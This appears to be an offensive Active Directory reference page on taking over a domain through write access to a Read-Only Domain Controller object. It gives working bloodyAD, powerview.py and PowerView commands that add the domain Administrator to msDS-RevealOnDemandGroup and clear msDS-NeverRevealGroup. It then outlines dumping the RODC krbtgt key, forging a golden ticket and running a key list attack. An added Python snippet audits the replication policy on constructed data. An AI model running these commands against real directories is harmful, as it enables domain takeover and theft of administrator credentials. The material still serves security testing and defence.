With administrative control over the RODC computer object in Active Directory, there is a path to full domain compromise. It is possible to modify the RODC's msDS-NeverRevealGroup and msDS-RevealOnDemandGroup attributes so that a Domain Admin's secrets are allowed to be cached on the RODC once that account authenticates against it; those secrets can then be dumped via administrative access over the RODC host.
For more granularity, any one of the following ACEs against the RODC object is initially sufficient, since each implicitly grants WriteProperty over the msDS-RevealOnDemandGroup and msDS-NeverRevealGroup attributes:

- GenericWrite
- GenericAll / FullControl
- WriteDacl (the attacker can modify the DACL and obtain arbitrary permissions)
- Owns (c.f. WriteDacl)
- WriteOwner (i.e. the attacker can obtain Owns -> WriteDacl -> other permissions)
- WriteProperty against the msDS-RevealOnDemandGroup attribute, in conjunction with another primitive to gain privileged access to the host. WriteProperty against the msDS-NeverRevealGroup attribute may also be required if that attribute covers the target account.
From UNIX-like systems, bloodyAD (Python) can be used for this purpose.

```bash
# Get original msDS-RevealOnDemandGroup values
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object 'RODC-server$' --attr msDS-RevealOnDemandGroup

distinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local
msDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local

# Add the previous value plus the admin account
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'

# If needed, remove the admin from the msDS-NeverRevealGroup attribute
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-NeverRevealGroup
```
Alternatively, powerview.py offers the same PowerView-style cmdlets from UNIX-like systems.

```bash
powerview "$DOMAIN"/"$USER":"$PASSWORD"@"RODC_FQDN"

# First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
# Then, append the Allowed RODC Password Replication Group group
PV> Set-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'
PV> Set-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'

# If needed, remove the admin from the msDS-NeverRevealGroup attribute
PV> Set-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup
```
From Windows systems, PowerView (PowerShell) can be used for this purpose.
```powershell
# First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
Set-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local','CN=Administrator,CN=Users,DC=domain,DC=local')}

# If needed, remove the admin from the msDS-NeverRevealGroup attribute
Set-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'
```
Then, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (such access can be obtained by modifying the managedBy attribute, for example), and use it to forge an RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.
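The attribute changes above are visible to a defender as a change in the RODC's Password Replication Policy. The following added example (not part of the original page or of any of the tools it mentions) evaluates that policy the way the attack relies on it, with msDS-NeverRevealGroup overriding msDS-RevealOnDemandGroup, and flags privileged accounts whose secrets the RODC is allowed to cache; the DNs, group memberships and the PRIVILEGED_GROUPS set are constructed sample data, and the transitive memberships would come from a real LDAP query in practice.

```python
# Added example: audit an RODC Password Replication Policy for revealable privileged accounts.
# All DNs and memberships below are constructed sample data, not values from a real domain.
ALLOWED = "CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local"
DENIED = "CN=Denied RODC Password Replication Group,CN=Users,DC=domain,DC=local"
DOMAIN_ADMINS = "CN=Domain Admins,CN=Users,DC=domain,DC=local"
ADMIN = "CN=Administrator,CN=Users,DC=domain,DC=local"

# The RODC object's policy attributes after the attacker appended the Administrator DN
# to msDS-RevealOnDemandGroup but before msDS-NeverRevealGroup was cleared.
RODC_POLICY = {
    "msDS-RevealOnDemandGroup": [ALLOWED, ADMIN],
    "msDS-NeverRevealGroup": [DENIED],
}

# Transitive group membership per account (constructed). By default Domain Admins is a
# member of the Denied group, so the Administrator inherits the deny entry transitively.
MEMBER_OF = {
    ADMIN: {DOMAIN_ADMINS, DENIED},
    "CN=jdoe,CN=Users,DC=domain,DC=local": {ALLOWED},
    "CN=svc-backup,CN=Users,DC=domain,DC=local": {ALLOWED, DENIED},
}

PRIVILEGED_GROUPS = {DOMAIN_ADMINS}


def is_revealable(account_dn, policy, member_of):
    """True if the RODC may cache this account's secrets: the account itself or one
    of its (transitive) groups is listed in msDS-RevealOnDemandGroup and none of them
    is listed in msDS-NeverRevealGroup. A deny entry always wins over an allow entry."""
    principals = {account_dn} | member_of.get(account_dn, set())
    if principals & set(policy.get("msDS-NeverRevealGroup", [])):
        return False
    return bool(principals & set(policy.get("msDS-RevealOnDemandGroup", [])))


def audit(policy, member_of, privileged_groups):
    """Return the privileged accounts (members of any privileged group) whose
    secrets the RODC is currently allowed to cache. An empty list is the expected
    healthy state; a non-empty list is the condition the attack above creates."""
    return sorted(
        dn for dn, groups in member_of.items()
        if groups & privileged_groups and is_revealable(dn, policy, member_of)
    )


def cleared_never_reveal(policy):
    """Simulate the '-Clear msDS-NeverRevealGroup' step to see what it exposes."""
    return {"msDS-RevealOnDemandGroup": list(policy["msDS-RevealOnDemandGroup"]),
            "msDS-NeverRevealGroup": []}
```

Running audit() against the two policy states shows why the page says clearing msDS-NeverRevealGroup "may be required": while the deny entry stands, the Administrator stays non-revealable despite being listed in the allow attribute.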